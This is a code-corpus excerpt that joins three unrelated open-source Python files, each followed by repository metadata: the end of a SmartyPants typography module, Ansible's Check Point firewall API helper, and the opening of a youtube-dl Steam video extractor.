* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in
the documentation and/or other materials provided with the
distribution.
This software is provided by the copyright holders and contributors "as
is" and any express or implied warranties, including, but not limited
to, the implied warranties of merchantability and fitness for a
particular purpose are disclaimed. In no event shall the copyright
owner or contributors be liable for any direct, indirect, incidental,
special, exemplary, or consequential damages (including, but not
limited to, procurement of substitute goods or services; loss of use,
data, or profits; or business interruption) however caused and on any
theory of liability, whether in contract, strict liability, or tort
(including negligence or otherwise) arising in any way out of the use
of this software, even if advised of the possibility of such damage.
.. _John Gruber: http://daringfireball.net/
.. _Chad Miller: http://web.chad.org/
.. _Pyblosxom: http://roughingit.subtlehints.net/pyblosxom
.. _SmartyPants: http://daringfireball.net/projects/smartypants/
.. _Movable Type: http://www.movabletype.org/
"""
default_smartypants_attr = "1"
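# Illustrative usage sketch (not part of the original module); the output shown
# follows the entity forms documented in the docstring above for the default
# attribute "1":
# >>> smartyPants('"Isn\'t this fun?" -- he said...')
# '&#8220;Isn&#8217;t this fun?&#8221; &#8212; he said&#8230;'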
import re
tags_to_skip_regex = re.compile(r"<(/)?(pre|code|kbd|script|math)[^>]*>", re.I)
def verify_installation(request):
return 1
# assert the plugin is functional
def cb_story(args):
global default_smartypants_attr
try:
forbidden_flavours = args["entry"]["smartypants_forbidden_flavours"]
except KeyError:
forbidden_flavours = [ "rss" ]
try:
attributes = args["entry"]["smartypants_attributes"]
except KeyError:
attributes = default_smartypants_attr
if attributes is None:
attributes = default_smartypants_attr
entryData = args["entry"].getData()
try:
if args["request"]["flavour"] in forbidden_flavours:
return
except KeyError:
if "<" in args["entry"]["body"][0:15]: # sniff the stream
return # abort if it looks like escaped HTML. FIXME
# FIXME: make these configurable, perhaps?
args["entry"]["body"] = smartyPants(entryData, attributes)
args["entry"]["title"] = smartyPants(args["entry"]["title"], attributes)
### interal functions below here
def smartyPants(text, attr=default_smartypants_attr):
convert_quot = False # should we translate " entities into normal quotes?
# Parse attributes:
# 0 : do nothing
# 1 : set all
# 2 : set all, using old school en- and em- dash shortcuts
# 3 : set all, using inverted old school en and em- dash shortcuts
#
# q : quotes
# b : backtick quotes (``double'' only)
# B : backtick quotes (``double'' and `single')
# d : dashes
# D : old school dashes
# i : inverted old school dashes
# e : ellipses
# w : convert " entities to " for Dreamweaver users
skipped_tag_stack = []
do_dashes = "0"
do_backticks = "0"
do_quotes = "0"
do_ellipses = "0"
do_stupefy = "0"
if attr == "0":
# Do nothing.
return text
elif attr == "1":
do_quotes = "1"
do_backticks = "1"
do_dashes = "1"
do_ellipses = "1"
elif attr == "2":
# Do everything, turn all options on, use old school dash shorthand.
do_quotes = "1"
do_backticks = "1"
do_dashes = "2"
do_ellipses = "1"
elif attr == "3":
# Do everything, turn all options on, use inverted old school dash shorthand.
do_quotes = "1"
do_backticks = "1"
do_dashes = "3"
do_ellipses = "1"
elif attr == "-1":
# Special "stupefy" mode.
do_stupefy = "1"
else:
for c in attr:
if c == "q": do_quotes = "1"
elif c == "b": do_backticks = "1"
elif c == "B": do_backticks = "2"
elif c == "d": do_dashes = "1"
elif c == "D": do_dashes = "2"
elif c == "i": do_dashes = "3"
elif c == "e": do_ellipses = "1"
elif c == "w": convert_quot = "1"
else:
pass
# ignore unknown option
tokens = _tokenize(text)
result = []
in_pre = False
prev_token_last_char = ""
# This is a cheat, used to get some context
# for one-character tokens that consist of
# just a quote char. What we do is remember
# the last character of the previous text
# token, to use as context to curl single-
# character quote tokens correctly.
for cur_token in tokens:
if cur_token[0] == "tag":
# Don't mess with quotes inside some tags. This does not handle self <closing/> tags!
result.append(cur_token[1])
skip_match = tags_to_skip_regex.match(cur_token[1])
if skip_match is not None:
if not skip_match.group(1):
skipped_tag_stack.append(skip_match.group(2).lower())
in_pre = True
else:
if len(skipped_tag_stack) > 0:
if skip_match.group(2).lower() == skipped_tag_stack[-1]:
skipped_tag_stack.pop()
else:
pass
# This close doesn't match the open. This isn't XHTML. We should barf here.
if len(skipped_tag_stack) == 0:
in_pre = False
else:
t = cur_token[1]
last_char = t[-1:] # Remember last char of this token before processing.
if not in_pre:
oldstr = t
t = processEscapes(t)
if convert_quot != "0":
t = re.sub('"', '"', t)
if do_dashes != "0":
if do_dashes == "1":
t = educateDashes(t)
if do_dashes == "2":
t = educateDashesOldSchool(t)
if do_dashes == "3":
t = educateDashesOldSchoolInverted(t)
if do_ellipses != "0":
t = educateEllipses(t)
# Note: backticks need to be processed before quotes.
if do_backticks != "0":
t = educateBackticks(t)
if do_backticks == "2":
t = educateSingleBackticks(t)
if do_quotes != "0":
if t == "'":
# Special case: single-character ' token
if re.match("\S", prev_token_last_char):
t = "’"
else:
t = "‘"
elif t == '"':
# Special case: single-character " token
if re.match("\S", prev_token_last_char):
t = "”"
else:
t = "“"
else:
# Normal case:
t = educateQuotes(t)
if do_stupefy == "1":
t = stupefyEntities(t)
prev_token_last_char = last_char
result.append(t)
return "".join(result)
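# A minimal illustrative use of smartyPants() with the attribute values parsed above:
#   smartyPants('"Hello" -- world...')      # default attr "1": curly quotes, em-dash, ellipsis
#   smartyPants("leave 'me' alone", "0")    # attr "0": returned unchanged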
def educateQuotes(str):
"""
Parameter: String.
Returns: The string, with "educated" curly quote HTML entities.
Example input: "Isn't this fun?"
Example output: “Isn’t this fun?”
"""
oldstr = str
punct_class = r"""[!"#\$\%'()*+,-.\/:;<=>?\@\[\\\]\^_`{|}~]"""
# Special case if the very first character is a quote
# followed by punctuation at a non-word-break. Close the quotes by brute force:
str = re.sub(r"""^'(?=%s\\B)""" % (punct_class,), r"""’""", str)
str = re.sub(r"""^"(?=%s\\B)""" % (punct_class,), r"""”""", str)
# Special case for double sets of quotes, e.g.:
# <p>He said, "'Quoted' words in a larger quote."</p>
str = re.sub(r""""'(?=\w)""", """“‘""", str)
str = re.sub(r"""'"(?=\w)""", """‘“""", str)
# Special case for decade abbreviations (the '80s):
str = re.sub(r"""\b'(?=\d{2}s)""", r"""’""", str)
close_class = r"""[^\ \t\r\n\[\{\(\-]"""
dec_dashes = r"""–|—"""
# Get most opening single quotes:
opening_single_quotes_regex = re.compile(r"""
(
\s | # a whitespace char, or
 &nbsp; | # a non-breaking space entity, or
-- | # dashes, or
&[mn]dash; | # named dash entities
%s | # or decimal entities
&\#x201[34]; # or hex
)
' # the quote
(?=\w) # followed by a word character
""" % (dec_dashes,), re.VERBOSE)
str = opening_single_quotes_regex.sub(r"""\1‘""", str)
closing_single_quotes_regex = re.compile(r"""
(%s)
'
(?!\s | s\b | \d)
""" % (close_class,), re.VERBOSE)
str = closing_single_quotes_regex.sub(r"""\1’""", str)
closing_single_quotes_regex = re.compile(r"""
(%s)
'
(\s | s\b)
""" % (close_class,), re.VERBOSE)
str = closing_single_quotes_regex.sub(r"""\1’\2""", str)
# Any remaining single quotes should be opening ones:
str = re.sub(r"""'""", r"""‘""", str)
# Get most opening double quotes:
opening_double_quotes_regex = re.compile(r"""
(
\s | # a whitespace char, or
 &nbsp; | # a non-breaking space entity, or
-- | # dashes, or
&[mn]dash; | # named dash entities
%s | # or decimal entities
&\#x201[34]; # or hex
)
" # the quote
(?=\w) # followed by a word character
""" % (dec_dashes,), re.VERBOSE)
str = opening_double_quotes_regex.sub(r"""\1“""", str)
# Double closing quotes:
closing_double_quotes_regex = re.compile(r"""
#(%s)? # character that indicates the quote should be closing
"
(?=\s)
""" % (close_class,), re.VERBOSE)
str = closing_double_quotes_regex.sub(r"""”""", str)
closing_double_quotes_regex = re.compile(r"""
(%s) # character that indicates the quote should be closing
"
""" % (close_class,), re.VERBOSE)
str = closing_double_quotes_regex.sub(r"""\1”""", str)
# Any remaining quotes should be opening ones.
str = re.sub(r'"', r"""“""", str)
return str
def educateBackticks(str):
"""
Parameter: String.
Returns: The string, with ``backticks'' -style double quotes
translated into HTML curly quote entities.
Example input: ``Isn't this fun?''
Example output: “Isn't this fun?”
"""
str = re.sub(r"""``""", r"""“""", str)
str = re.sub(r"""''""", r"""”""", str)
return str
def educateSingleBackticks(str):
"""
Parameter: String.
Returns: The string, with `backticks' -style single quotes
translated into HTML curly quote entities.
Example input: `Isn't this fun?'
Example output: ‘Isn’t this fun?’
"""
str = re.sub(r"""`""", r"""‘""", str)
str = re.sub(r"""'""", r"""’""", str)
return str
def educateDashes(str):
"""
Parameter: String.
Returns: The string, with each instance of "--" translated to
an em-dash HTML entity.
"""
str = re.sub(r"""---""", r"""–""", str) # en (yes, backwards)
str = re.sub(r"""--""", r"""—""", str) # em (yes, backwards)
return str
def educateDashesOldSchool(str):
"""
Parameter: String.
Returns: The string, with each instance of "--" translated to
an en-dash HTML entity, and each "---" translated to
an em-dash HTML entity.
"""
str = re.sub(r"""---""", r"""—""", str) # em (yes, backwards)
str = re.sub(r"""--""", r"""–""", str) # en (yes, backwards)
return str
def educateDashesOldSchoolInverted(str):
"""
Parameter: String.
Returns: The string, with each instance of "--" translated to
an em-dash HTML entity, and each "---" translated to
an en-dash HTML entity. Two reasons why: First, unlike the
en- and em-dash syntax supported by
EducateDashesOldSchool(), it's compatible with existing
entries written before SmartyPants 1.1, back when "--" was
only used for em-dashes. Second, em-dashes are more
common than en-dashes, and so it sort of makes sense that
the shortcut should be shorter to type. (Thanks to Aaron
Swartz for the idea.)
"""
    str = re.sub(r"""---""", r"""–""", str) # en
    str = re.sub(r"""--""", r"""—""", str) # em
return str
def educateEllipses(str):
"""
Parameter: String.
Returns: The string, with each instance of "..." translated to
an ellipsis HTML entity.
Example input: Huh...?
Example output: Huh…?
"""
str = re.sub(r"""\.\.\.""", r"""…""", str)
str = re.sub(r"""\. \. \.""", r"""…""", str)
return str
def stupefyEntities(str):
"""
Parameter: String.
Returns: The string, with each SmartyPants HTML entity translated to
its ASCII counterpart.
Example input: “Hello — world.”
Example output: "Hello -- world."
"""
str = re.sub(r"""–""", r"""-""", str) # en-dash
str = re.sub(r"""—""", r"""--""", str) # em-dash
str = re.sub(r"""‘""", r"""'""", str) # open single quote
str = re.sub(r"""’""", r"""'""", str) # close single quote
str = re.sub(r"""“""", r'''"''', str) # open double quote
str = re.sub(r"""”""", r'''"''', str) # close double quote
str = re.sub(r"""…""", r"""...""", str)# ellipsis
return str
def processEscapes(str):
r"""
Parameter: String.
    Returns: The string, after processing the following backslash
escape sequences. This is useful if you want to force a "dumb"
quote or other character to appear.
Escape Value
------ -----
\\ \
\" "
\' '
\. .
\- -
\` `
"""
    str = re.sub(r"""\\\\""", r"""\\""", str)
    str = re.sub(r'''\\"''', r'''"''', str)
str = re.sub(r"""\\'""", r"""'""", str)
str = re.sub(r"""\\\.""", r""".""", str)
str = re.sub(r"""\\-""", r"""-""", str)
str = re.sub(r"""\\`""", r"""`""", str)
return str
def _tokenize(str):
"""
Parameter: String containing HTML markup.
Returns: Reference to an array of the tokens comprising the input
string. Each token is either a tag (possibly with nested,
tags contained therein, such as <a href="<MTFoo>">, or a
run of text between tags. Each element of the array is a
two-element array; the first is either 'tag' or 'text';
the second is the actual value.
Based on the _tokenize() subroutine from Brad Choate's MTRegex plugin.
<http://www.bradchoate.com/past/mtregex.php>
"""
pos = 0
length = len(str)
tokens = []
depth = 6
nested_tags = "|".join(['(?:<(?:[^<>]',] * depth) + (')*>)' * depth)
#match = r"""(?: <! ( -- .*? -- \s* )+ > ) | # comments
# (?: <\? .*? \?> ) | # directives
# %s # nested tags """ % (nested_tags,)
tag_soup = re.compile(r"""([^<]*)(<[^>]*>)""")
token_match = tag_soup.search(str)
previous_end = 0
while token_match is not None:
if token_match.group(1):
tokens.append(['text', token_match.group(1)])
tokens.append(['tag', token_match.group(2)])
previous_end = token_match.end()
token_match = tag_soup.search(str, token_match.end())
if previous_end < len(str):
tokens.append(['text', str[previous_end:]])
return tokens
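# Illustrative example: _tokenize('<p>Hi "there"</p>') yields
#   [['tag', '<p>'], ['text', 'Hi "there"'], ['tag', '</p>']]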
if __name__ == "__main__":
import locale
try:
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_string
docstring_html = publish_string(__doc__, writer_name='html')
print docstring_html
# Unit test output goes out stderr. No worries.
import unittest
sp = smartyPants
class TestSmartypantsAllAttributes(unittest.TestCase):
# the default attribute is "1", which means "all".
def test_dates(self):
self.assertEqual(sp("1440-80's"), "1440-80’s")
self.assertEqual(sp("1440-'80s"), "1440-‘80s")
self.assertEqual(sp("1440---'80s"), "1440–‘80s")
self.assertEqual(sp("1960s"), "1960s") # no effect.
self.assertEqual(sp("1960's"), "1960’s")
self.assertEqual(sp("one two '60s"), "one two ‘60s")
self.assertEqual(sp("'60s"), "‘60s")
def test_skip_tags(self):
self.assertEqual(
sp("""<script type="text/javascript">\n<!--\nvar href = "http://www.google.com";\nvar linktext = "google";\ndocument.write('<a href="' + href + '">' + linktext + "</a>");\n//-->\n</script>"""),
"""<script type="text/javascript">\n<!--\nvar href = "http://www.google.com";\nvar linktext = "google";\ndocument.write('<a href="' + href + '">' + linktext + "</a>");\n//-->\n</script>""")
self.assertEqual(
sp("""<p>He said "Let's write some code." This code here <code>if True:\n\tprint "Okay"</code> is python code.</p>"""),
"""<p>He said “Let’s write some code.” This code here <code>if True:\n\tprint "Okay"</code> is python code.</p>""")
def test_ordinal_numbers(self):
self.assertEqual(sp("21st century"), "21st century") # no effect.
self.assertEqual(sp("3rd"), "3rd") # no effect.
def test_educated_quotes(self):
self.assertEqual(sp('''"Isn't this fun?"'''), '''“Isn’t this fun?”''')
unittest.main()
__author__ = "Chad Miller <[email protected]>"
__version__ = "1.5_1.6: Fri, 27 Jul 2007 07:06:40 -0400"
__url__ = "http://wiki.chad.org/SmartyPantsPy"
__description__ = "Smart-quotes, smart-ellipses, and smart-dashes for weblog entries in pyblosxom"
| mit | -1,972,851,282,068,823,300 | 31.292359 | 198 | 0.650686 | false |
resmo/ansible | lib/ansible/module_utils/network/checkpoint/checkpoint.py | 8 | 19463 | # This code is part of Ansible, but is an independent component.
# This particular file snippet, and this file snippet only, is BSD licensed.
# Modules you write using this snippet, which is embedded dynamically by Ansible
# still belong to the author of the module, and may assign their own license
# to the complete work.
#
# (c) 2018 Red Hat Inc.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
from __future__ import (absolute_import, division, print_function)
import time
from ansible.module_utils.connection import Connection
checkpoint_argument_spec_for_objects = dict(
auto_publish_session=dict(type='bool'),
wait_for_task=dict(type='bool', default=True),
state=dict(type='str', choices=['present', 'absent'], default='present'),
version=dict(type='str')
)
checkpoint_argument_spec_for_facts = dict(
version=dict(type='str')
)
checkpoint_argument_spec_for_commands = dict(
wait_for_task=dict(type='bool', default=True),
version=dict(type='str')
)
delete_params = ['name', 'uid', 'layer', 'exception-group-name', 'layer', 'rule-name']
# send the request to checkpoint
def send_request(connection, version, url, payload=None):
code, response = connection.send_request('/web_api/' + version + url, payload)
return code, response
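# For example (illustrative values): send_request(connection, 'v1.5/', 'show-hosts')
# posts to /web_api/v1.5/show-hosts, while an empty version posts to /web_api/show-hosts.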
# get the payload from the user parameters
def is_checkpoint_param(parameter):
if parameter == 'auto_publish_session' or \
parameter == 'state' or \
parameter == 'wait_for_task' or \
parameter == 'version':
return False
return True
# build the payload from the parameters which has value (not None), and they are parameter of checkpoint API as well
def get_payload_from_parameters(params):
payload = {}
for parameter in params:
parameter_value = params[parameter]
if parameter_value and is_checkpoint_param(parameter):
if isinstance(parameter_value, dict):
payload[parameter.replace("_", "-")] = get_payload_from_parameters(parameter_value)
elif isinstance(parameter_value, list) and len(parameter_value) != 0 and isinstance(parameter_value[0], dict):
payload_list = []
for element_dict in parameter_value:
payload_list.append(get_payload_from_parameters(element_dict))
payload[parameter.replace("_", "-")] = payload_list
else:
payload[parameter.replace("_", "-")] = parameter_value
return payload
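# Illustrative example with hypothetical module params: get_payload_from_parameters(
# {'name': 'host1', 'ip_address': '1.2.3.4', 'state': 'present', 'wait_for_task': True})
# returns {'name': 'host1', 'ip-address': '1.2.3.4'} -- Ansible-only parameters are
# dropped and underscores become dashes.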
# wait for task
def wait_for_task(module, version, connection, task_id):
task_id_payload = {'task-id': task_id}
task_complete = False
current_iteration = 0
max_num_iterations = 300
# As long as there is a task in progress
while not task_complete and current_iteration < max_num_iterations:
current_iteration += 1
# Check the status of the task
code, response = send_request(connection, version, 'show-task', task_id_payload)
attempts_counter = 0
while code != 200:
if attempts_counter < 5:
attempts_counter += 1
time.sleep(2)
code, response = send_request(connection, version, 'show-task', task_id_payload)
else:
response['message'] = "ERROR: Failed to handle asynchronous tasks as synchronous, tasks result is" \
" undefined.\n" + response['message']
module.fail_json(msg=response)
# Count the number of tasks that are not in-progress
completed_tasks = 0
for task in response['tasks']:
if task['status'] == 'failed':
module.fail_json(msg='Task {0} with task id {1} failed. Look at the logs for more details'
.format(task['task-name'], task['task-id']))
if task['status'] == 'in progress':
break
completed_tasks += 1
# Are we done? check if all tasks are completed
if completed_tasks == len(response["tasks"]):
task_complete = True
else:
time.sleep(2) # Wait for two seconds
if not task_complete:
module.fail_json(msg="ERROR: Timeout.\nTask-id: {0}.".format(task_id_payload['task-id']))
# handle publish command, and wait for it to end if the user asked to do so
def handle_publish(module, connection, version):
if module.params['auto_publish_session']:
publish_code, publish_response = send_request(connection, version, 'publish')
if publish_code != 200:
module.fail_json(msg=publish_response)
if module.params['wait_for_task']:
wait_for_task(module, version, connection, publish_response['task-id'])
# handle a command
def api_command(module, command):
payload = get_payload_from_parameters(module.params)
connection = Connection(module._socket_path)
# if user insert a specific version, we add it to the url
version = ('v' + module.params['version'] + '/') if module.params.get('version') else ''
code, response = send_request(connection, version, command, payload)
result = {'changed': True}
if code == 200:
if module.params['wait_for_task']:
if 'task-id' in response:
wait_for_task(module, version, connection, response['task-id'])
elif 'tasks' in response:
for task_id in response['tasks']:
wait_for_task(module, version, connection, task_id)
result[command] = response
else:
module.fail_json(msg='Checkpoint device returned error {0} with message {1}'.format(code, response))
return result
# handle api call facts
def api_call_facts(module, api_call_object, api_call_object_plural_version):
payload = get_payload_from_parameters(module.params)
connection = Connection(module._socket_path)
# if user insert a specific version, we add it to the url
version = ('v' + module.params['version'] + '/') if module.params['version'] else ''
# if there is neither name nor uid, the API command will be in plural version (e.g. show-hosts instead of show-host)
if payload.get("name") is None and payload.get("uid") is None:
api_call_object = api_call_object_plural_version
code, response = send_request(connection, version, 'show-' + api_call_object, payload)
if code != 200:
module.fail_json(msg='Checkpoint device returned error {0} with message {1}'.format(code, response))
result = {api_call_object: response}
return result
# handle api call
def api_call(module, api_call_object):
payload = get_payload_from_parameters(module.params)
connection = Connection(module._socket_path)
result = {'changed': False}
if module.check_mode:
return result
# if user insert a specific version, we add it to the url
version = ('v' + module.params['version'] + '/') if module.params.get('version') else ''
payload_for_equals = {'type': api_call_object, 'params': payload}
equals_code, equals_response = send_request(connection, version, 'equals', payload_for_equals)
result['checkpoint_session_uid'] = connection.get_session_uid()
# if code is 400 (bad request) or 500 (internal error) - fail
if equals_code == 400 or equals_code == 500:
module.fail_json(msg=equals_response)
if equals_code == 404 and equals_response['code'] == 'generic_err_command_not_found':
module.fail_json(msg='Relevant hotfix is not installed on Check Point server. See sk114661 on Check Point Support Center.')
if module.params['state'] == 'present':
if equals_code == 200:
if not equals_response['equals']:
code, response = send_request(connection, version, 'set-' + api_call_object, payload)
if code != 200:
module.fail_json(msg=response)
handle_publish(module, connection, version)
result['changed'] = True
result[api_call_object] = response
else:
# objects are equals and there is no need for set request
pass
elif equals_code == 404:
code, response = send_request(connection, version, 'add-' + api_call_object, payload)
if code != 200:
module.fail_json(msg=response)
handle_publish(module, connection, version)
result['changed'] = True
result[api_call_object] = response
elif module.params['state'] == 'absent':
if equals_code == 200:
payload_for_delete = get_copy_payload_with_some_params(payload, delete_params)
code, response = send_request(connection, version, 'delete-' + api_call_object, payload_for_delete)
if code != 200:
module.fail_json(msg=response)
handle_publish(module, connection, version)
result['changed'] = True
elif equals_code == 404:
        # no need to delete because object does not exist
pass
return result
# get the position in integer format
def get_number_from_position(payload, connection, version):
if 'position' in payload:
position = payload['position']
else:
return None
# This code relevant if we will decide to support 'top' and 'bottom' in position
# position_number = None
# # if position is not int, convert it to int. There are several cases: "top"
# if position == 'top':
# position_number = 1
# elif position == 'bottom':
# payload_for_show_access_rulebase = {'name': payload['layer'], 'limit': 0}
# code, response = send_request(connection, version, 'show-access-rulebase', payload_for_show_access_rulebase)
# position_number = response['total']
# elif isinstance(position, str):
# # here position is a number in format str (e.g. "5" and not 5)
# position_number = int(position)
# else:
# # here position suppose to be int
# position_number = position
#
# return position_number
return int(position)
# check whether the position param (if the user provided it) is equal between the existing object and the user input
def is_equals_with_position_param(payload, connection, version, api_call_object):
position_number = get_number_from_position(payload, connection, version)
    # if there is no position param, it is considered equal (vacuously true)
if position_number is None:
return True
payload_for_show_access_rulebase = {'name': payload['layer'], 'offset': position_number - 1, 'limit': 1}
rulebase_command = 'show-' + api_call_object.split('-')[0] + '-rulebase'
# if it's threat-exception, we change a little the payload and the command
if api_call_object == 'threat-exception':
payload_for_show_access_rulebase['rule-name'] = payload['rule-name']
rulebase_command = 'show-threat-rule-exception-rulebase'
code, response = send_request(connection, version, rulebase_command, payload_for_show_access_rulebase)
    # if true, there is no rule at the position the user specified, so return False; when we later try to set
    # the rule, the API server will raise the relevant error
if response['total'] < position_number:
return False
rule = response['rulebase'][0]
while 'rulebase' in rule:
rule = rule['rulebase'][0]
    # if the names of the existing rule and the user input rule are equal, their positions are equal, so return
    # True. There cannot be another rule with this name, because otherwise the 'equals' command would have failed
if rule['name'] == payload['name']:
return True
else:
return False
# get copy of the payload without some of the params
def get_copy_payload_without_some_params(payload, params_to_remove):
copy_payload = dict(payload)
for param in params_to_remove:
if param in copy_payload:
del copy_payload[param]
return copy_payload
# get copy of the payload with only some of the params
def get_copy_payload_with_some_params(payload, params_to_insert):
copy_payload = {}
for param in params_to_insert:
if param in payload:
copy_payload[param] = payload[param]
return copy_payload
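# e.g. get_copy_payload_with_some_params({'name': 'rule1', 'layer': 'Network', 'action': 'drop'},
# ['name', 'uid', 'layer']) returns {'name': 'rule1', 'layer': 'Network'} (illustrative values).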
# check equality of all the params, including action and position
def is_equals_with_all_params(payload, connection, version, api_call_object, is_access_rule):
if is_access_rule and 'action' in payload:
payload_for_show = get_copy_payload_with_some_params(payload, ['name', 'uid', 'layer'])
code, response = send_request(connection, version, 'show-' + api_call_object, payload_for_show)
exist_action = response['action']['name']
if exist_action != payload['action']:
return False
if not is_equals_with_position_param(payload, connection, version, api_call_object):
return False
return True
# handle api call for rule
def api_call_for_rule(module, api_call_object):
is_access_rule = True if 'access' in api_call_object else False
payload = get_payload_from_parameters(module.params)
connection = Connection(module._socket_path)
result = {'changed': False}
if module.check_mode:
return result
# if user insert a specific version, we add it to the url
version = ('v' + module.params['version'] + '/') if module.params.get('version') else ''
if is_access_rule:
copy_payload_without_some_params = get_copy_payload_without_some_params(payload, ['action', 'position'])
else:
copy_payload_without_some_params = get_copy_payload_without_some_params(payload, ['position'])
payload_for_equals = {'type': api_call_object, 'params': copy_payload_without_some_params}
equals_code, equals_response = send_request(connection, version, 'equals', payload_for_equals)
result['checkpoint_session_uid'] = connection.get_session_uid()
# if code is 400 (bad request) or 500 (internal error) - fail
if equals_code == 400 or equals_code == 500:
module.fail_json(msg=equals_response)
if equals_code == 404 and equals_response['code'] == 'generic_err_command_not_found':
module.fail_json(msg='Relevant hotfix is not installed on Check Point server. See sk114661 on Check Point Support Center.')
if module.params['state'] == 'present':
if equals_code == 200:
if equals_response['equals']:
if not is_equals_with_all_params(payload, connection, version, api_call_object, is_access_rule):
equals_response['equals'] = False
if not equals_response['equals']:
# if user insert param 'position' and needed to use the 'set' command, change the param name to 'new-position'
if 'position' in payload:
payload['new-position'] = payload['position']
del payload['position']
code, response = send_request(connection, version, 'set-' + api_call_object, payload)
if code != 200:
module.fail_json(msg=response)
handle_publish(module, connection, version)
result['changed'] = True
result[api_call_object] = response
else:
# objects are equals and there is no need for set request
pass
elif equals_code == 404:
code, response = send_request(connection, version, 'add-' + api_call_object, payload)
if code != 200:
module.fail_json(msg=response)
handle_publish(module, connection, version)
result['changed'] = True
result[api_call_object] = response
elif module.params['state'] == 'absent':
if equals_code == 200:
payload_for_delete = get_copy_payload_with_some_params(payload, delete_params)
code, response = send_request(connection, version, 'delete-' + api_call_object, payload_for_delete)
if code != 200:
module.fail_json(msg=response)
handle_publish(module, connection, version)
result['changed'] = True
elif equals_code == 404:
        # no need to delete because object does not exist
pass
return result
# handle api call facts for rule
def api_call_facts_for_rule(module, api_call_object, api_call_object_plural_version):
payload = get_payload_from_parameters(module.params)
connection = Connection(module._socket_path)
# if user insert a specific version, we add it to the url
version = ('v' + module.params['version'] + '/') if module.params['version'] else ''
    # if there is no layer, the API command will be in plural version (e.g. show-access-rules instead of show-access-rule)
if payload.get("layer") is None:
api_call_object = api_call_object_plural_version
code, response = send_request(connection, version, 'show-' + api_call_object, payload)
if code != 200:
module.fail_json(msg='Checkpoint device returned error {0} with message {1}'.format(code, response))
result = {api_call_object: response}
return result
# The code from here till EOF will be deprecated when Rikis' modules are deprecated
checkpoint_argument_spec = dict(auto_publish_session=dict(type='bool', default=True),
policy_package=dict(type='str', default='standard'),
auto_install_policy=dict(type='bool', default=True),
targets=dict(type='list')
)
def publish(connection, uid=None):
payload = None
if uid:
payload = {'uid': uid}
connection.send_request('/web_api/publish', payload)
def discard(connection, uid=None):
payload = None
if uid:
payload = {'uid': uid}
connection.send_request('/web_api/discard', payload)
def install_policy(connection, policy_package, targets):
payload = {'policy-package': policy_package,
'targets': targets}
connection.send_request('/web_api/install-policy', payload)
| gpl-3.0 | -1,970,166,692,051,579,100 | 40.498934 | 131 | 0.644762 | false |
jbuchbinder/youtube-dl | youtube_dl/extractor/steam.py | 61 | 4662 | from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
ExtractorError,
unescapeHTML,
)
class SteamIE(InfoExtractor):
_VALID_URL = r"""(?x)
https?://store\.steampowered\.com/
(agecheck/)?
(?P<urltype>video|app)/ #If the page is only for videos or for a game
(?P<gameID>\d+)/?
(?P<videoID>\d*)(?P<extra>\??) # For urltype == video we sometimes get the videoID
|
https?://(?:www\.)?steamcommunity\.com/sharedfiles/filedetails/\?id=(?P<fileID>[0-9]+)
"""
_VIDEO_PAGE_TEMPLATE = 'http://store.steampowered.com/video/%s/'
_AGECHECK_TEMPLATE = 'http://store.steampowered.com/agecheck/video/%s/?snr=1_agecheck_agecheck__age-gate&ageDay=1&ageMonth=January&ageYear=1970'
_TESTS = [{
'url': 'http://store.steampowered.com/video/105600/',
'playlist': [
{
'md5': 'f870007cee7065d7c76b88f0a45ecc07',
'info_dict': {
'id': '81300',
'ext': 'flv',
'title': 'Terraria 1.1 Trailer',
'playlist_index': 1,
}
},
{
'md5': '61aaf31a5c5c3041afb58fb83cbb5751',
'info_dict': {
'id': '80859',
'ext': 'flv',
'title': 'Terraria Trailer',
'playlist_index': 2,
}
}
],
'params': {
'playlistend': 2,
}
}, {
'url': 'http://steamcommunity.com/sharedfiles/filedetails/?id=242472205',
'info_dict': {
'id': 'WB5DvDOOvAY',
'ext': 'mp4',
'upload_date': '20140329',
'title': 'FRONTIERS - Final Greenlight Trailer',
'description': 'md5:dc96a773669d0ca1b36c13c1f30250d9',
'uploader': 'AAD Productions',
'uploader_id': 'AtomicAgeDogGames',
}
}]
def _real_extract(self, url):
m = re.match(self._VALID_URL, url)
fileID = m.group('fileID')
if fileID:
videourl = url
playlist_id = fileID
else:
gameID = m.group('gameID')
playlist_id = gameID
videourl = self._VIDEO_PAGE_TEMPLATE % playlist_id
webpage = self._download_webpage(videourl, playlist_id)
if re.search('<h2>Please enter your birth date to continue:</h2>', webpage) is not None:
videourl = self._AGECHECK_TEMPLATE % playlist_id
self.report_age_confirmation()
webpage = self._download_webpage(videourl, playlist_id)
if fileID:
playlist_title = self._html_search_regex(
r'<div class="workshopItemTitle">(.+)</div>', webpage, 'title')
mweb = re.finditer(r'''(?x)
'movie_(?P<videoID>[0-9]+)':\s*\{\s*
YOUTUBE_VIDEO_ID:\s*"(?P<youtube_id>[^"]+)",
''', webpage)
videos = [{
'_type': 'url',
'url': vid.group('youtube_id'),
'ie_key': 'Youtube',
} for vid in mweb]
else:
playlist_title = self._html_search_regex(
r'<h2 class="pageheader">(.*?)</h2>', webpage, 'game title')
mweb = re.finditer(r'''(?x)
